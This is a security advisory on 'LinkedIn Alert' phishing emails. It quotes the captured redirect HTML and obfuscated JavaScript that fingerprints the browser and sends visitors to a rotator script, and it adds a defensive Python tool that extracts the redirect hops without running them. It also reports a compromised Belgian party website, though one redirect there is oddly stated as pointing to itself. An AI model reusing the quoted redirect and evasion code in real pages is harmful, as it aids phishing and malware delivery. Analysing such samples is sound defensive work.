Email messages with subject "LinkedIn Alert" lead to malware

A number of emails with the subject "LinkedIn Alert" were intercepted; they lead to a web site hosting malicious software and redirect visitors to an online pharmacy web site.

The email reproduces the LinkedIn branding quite well, so it looks convincing. All the URLs have been modified to direct the reader to a first web site; in this case we had hxxp://portalgamm.com.br/1.html, but the domains change quite rapidly. When visiting this web site we got the following HTML code:

PLEASE WAITING.... 4 SECONDS <meta http-equiv="refresh" content="4;url=hxxp://medicineni.com" />

The website borlakas.info contains the following JavaScript:
<script>
// "metka" is only set to '2' when the browser reports the Java plug-in as enabled
if (navigator.javaEnabled()) {
var metka = '2';
}
// the value is sent to the rotator as a tracking parameter; if no branch assigned it,
// the concatenation yields the string "undefined"
location.href = ('http://borlakas.info/asdfasgs/rotator.php?unique='
+ metka + '');
// navigator.taintEnabled() is a legacy method; the name is built by concatenation,
// which defeats naive string matching on the script
if (!frames.navigator['taintE' + 'nabled']()) {
var metka = '1';
}
location.href = ('http://borlakas.info/asdfasgs/rotator.php?unique='
+ metka + '');
</script>
After 4 seconds you are redirected to an online pharmacy web site.
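A defender-side triage helper that pulls the redirect hops out of captured page content without executing it, fed with the two samples quoted above. This is an added example, not part of the original report or of any product it mentions; it is regex-based and only recognises the meta-refresh and location.href forms seen here.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Samples copied from the captured pages quoted in this report (defanged as there).
STAGE1_HTML = ('PLEASE WAITING.... 4 SECONDS '
               '<meta http-equiv="refresh" content="4;url=hxxp://medicineni.com" />')
STAGE2_JS = """<script>
if (navigator.javaEnabled()) { var metka = '2'; }
location.href = ('http://borlakas.info/asdfasgs/rotator.php?unique=' + metka + '');
if (!frames.navigator['taintE' + 'nabled']()) { var metka = '1'; }
location.href = ('http://borlakas.info/asdfasgs/rotator.php?unique=' + metka + '');
</script>"""

META_REFRESH = re.compile(
    r'<meta\s+http-equiv\s*=\s*["\']refresh["\']\s+content\s*=\s*'
    r'["\'](\d+)\s*;\s*url=([^"\'\s]+)["\']', re.IGNORECASE)
LOCATION_HREF = re.compile(r"location\.href\s*=\s*([^;]+);", re.IGNORECASE)
PIECE = re.compile(r"'([^']*)'|\"([^\"]*)\"|([A-Za-z_$][\w$]*)")

@dataclass
class Redirect:
    kind: str             # "meta-refresh" or "location.href"
    target: str           # URL as written; script variables appear as {name}
    delay: "int | None"   # seconds before the hop, when the page states one

def rebuild(expr: str) -> str:
    """Join the string literals of a JS concatenation, keeping variables as {name}."""
    out = []
    for sq, dq, ident in PIECE.findall(expr):
        out.append("{" + ident + "}" if ident else (sq or dq))
    return "".join(out)

def extract_redirects(content: str) -> list:
    """Every hop the captured page would take, found statically (no execution)."""
    hops = [Redirect("meta-refresh", url, int(delay))
            for delay, url in META_REFRESH.findall(content)]
    hops += [Redirect("location.href", rebuild(expr), None)
             for expr in LOCATION_HREF.findall(content)]
    return hops

def target_hosts(hops: list) -> list:
    """Distinct hosts the visitor is sent to, in the order they appear."""
    seen = []
    for hop in hops:
        host = urlparse(hop.target).netloc
        if host and host not in seen:
            seen.append(host)
    return seen
```

Running extract_redirects over each captured stage and target_hosts over the combined result gives the hop list and the domains to block or hunt for in proxy logs.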
During our analysis of some messages we noticed that the authors of this campaign use valid domains of real company web sites. We found a URL on the site of a political party in Belgium, Vlaams Belang, so it seems that someone obtained access to drop the file 1.html on the Vlaams Belang server. The URL is hxxp://www.vlaamsbelang.org/1.html and the visitor is redirected to hxxp://www.vlaamsbelang.org/1.html. We made an effort to contact Vlaams Belang to notify them of the abuse of their web site, but it is clear that several other web sites are also affected.

3. Appendix

For more information, please visit http://www.ids-sax2.com/ComputerSecurityNewsletter.htm

